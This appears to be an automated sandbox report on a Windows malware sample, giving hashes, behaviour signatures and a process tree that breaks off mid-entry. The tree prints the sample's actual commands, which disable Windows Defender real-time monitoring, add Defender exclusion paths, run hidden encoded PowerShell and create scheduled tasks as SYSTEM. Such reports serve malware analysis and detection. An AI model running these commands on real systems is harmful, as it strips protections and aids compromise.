Analysis

  • max time kernel
    196s
  • max time network
    197s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    09/05/2024, 00:03

General

  • Target

    e486e64502b842262b2a4a9243e5ed08a342f24679de1f12f5873e776a605512.exe

  • Size

    7.3MB

  • MD5

    3a88e70eee1a5be85891dae08155627f

  • SHA1

    9be0c1f875b00bf332947e968fc185a1e96d2afd

  • SHA256

    e486e64502b842262b2a4a9243e5ed08a342f24679de1f12f5873e776a605512

  • SHA512

    cdcd62bcf522d446d463f5310062821eb3bac4032c405abb534735b92fd1d1bbc11c1a8fc427466769fac51f394c02d52f2d2d26670074a4029cfb968ff51a28

  • SSDEEP

    196608:91OKtAqnwGJZqRT8VeXYsVb54s7vHD/kuaVd1m6w3F/nTSFaOV:3OYAgJZw8kosVt3LHD/mX1m13F/nWaOV

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e486e64502b842262b2a4a9243e5ed08a342f24679de1f12f5873e776a605512.exe
    "C:\Users\Admin\AppData\Local\Temp\e486e64502b842262b2a4a9243e5ed08a342f24679de1f12f5873e776a605512.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2436
    • C:\Users\Admin\AppData\Local\Temp\7zS1FE0.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1508
      • C:\Users\Admin\AppData\Local\Temp\7zS22DC.tmp\Install.exe
        .\Install.exe /SxKydidW "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3032
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2764
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2676
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2272
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:2624
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:2756
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2636
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                  PID:2680
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    6⤵
                      PID:2908
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        7⤵
                          PID:2556
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      5⤵
                        PID:2608
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          6⤵
                            PID:2884
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              7⤵
                                PID:3060
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            5⤵
                              PID:2656
                              • C:\Windows\SysWOW64\cmd.exe
                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                6⤵
                                  PID:1316
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2632
                                    • C:\Windows\SysWOW64\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      8⤵
                                        PID:2596
                              • C:\Windows\SysWOW64\forfiles.exe
                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                4⤵
                                  PID:2992
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                    5⤵
                                      PID:2988
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        6⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3004
                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                          7⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2828
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\ubbKbcd.exe\" LY /kFYdidMhXr 525403 /S" /V1 /F
                                    4⤵
                                    • Drops file in Windows directory
                                    • Creates scheduled task(s)
                                    PID:316
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                                    4⤵
                                      PID:1752
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                        5⤵
                                          PID:1044
                                          • \??\c:\windows\SysWOW64\schtasks.exe
                                            schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                            6⤵
                                              PID:1052
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {9A728DEA-600A-40C8-828D-202F19D893BA} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:2508
                                      • C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\ubbKbcd.exe
                                        C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\ubbKbcd.exe LY /kFYdidMhXr 525403 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:2816
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                            PID:1564
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              4⤵
                                                PID:2056
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  5⤵
                                                    PID:1600
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      6⤵
                                                        PID:1616
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                    4⤵
                                                      PID:2072
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:2060
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:1300
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                          4⤵
                                                            PID:1348
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                              5⤵
                                                                PID:1716
                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                  6⤵
                                                                    PID:1724
                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                4⤵
                                                                  PID:1192
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                    5⤵
                                                                      PID:2252
                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                        6⤵
                                                                          PID:320
                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                      4⤵
                                                                        PID:2928
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                          5⤵
                                                                            PID:1612
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                              6⤵
                                                                              • Command and Scripting Interpreter: PowerShell
                                                                              • Drops file in System32 directory
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:2796
                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                7⤵
                                                                                  PID:1972
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gwabrEVlB" /SC once /ST 00:00:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:1032
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gwabrEVlB"
                                                                          3⤵
                                                                            PID:1484
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gwabrEVlB"
                                                                            3⤵
                                                                              PID:1536
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                              3⤵
                                                                                PID:2124
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                  4⤵
                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                  PID:1428
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                3⤵
                                                                                  PID:2336
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                    4⤵
                                                                                    • Modifies Windows Defender Real-time Protection settings
                                                                                    PID:2396
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /CREATE /TN "goCXxxMIs" /SC once /ST 00:02:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:548
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  schtasks /run /I /tn "goCXxxMIs"
                                                                                  3⤵
                                                                                    PID:880
                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                    schtasks /DELETE /F /TN "goCXxxMIs"
                                                                                    3⤵
                                                                                      PID:1212
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                      3⤵
                                                                                        PID:2584
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                          4⤵
                                                                                            PID:2568
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2684
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                6⤵
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3016
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:2412
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                              4⤵
                                                                                              • Windows security bypass
                                                                                              PID:2580
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:2024
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                4⤵
                                                                                                • Windows security bypass
                                                                                                PID:2616
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:1944
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:32
                                                                                                  4⤵
                                                                                                    PID:2996
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:2992
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:64
                                                                                                      4⤵
                                                                                                        PID:1188
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\HHaPXpcT\IYttjSsbaiTCHbiq.wsf"
                                                                                                      3⤵
                                                                                                        PID:2184
                                                                                                      • C:\Windows\SysWOW64\wscript.exe
                                                                                                        wscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\HHaPXpcT\IYttjSsbaiTCHbiq.wsf"
                                                                                                        3⤵
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:2176
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:288
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1436
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:3012
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1616
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1300
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:848
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2252
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2936
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1912
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:1564
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:780
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:560
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:708
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2312
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:32
                                                                                                          4⤵
                                                                                                          • Windows security bypass
                                                                                                          PID:2476
                                                                                                        • C:\Windows\SysWOW64\reg.exe
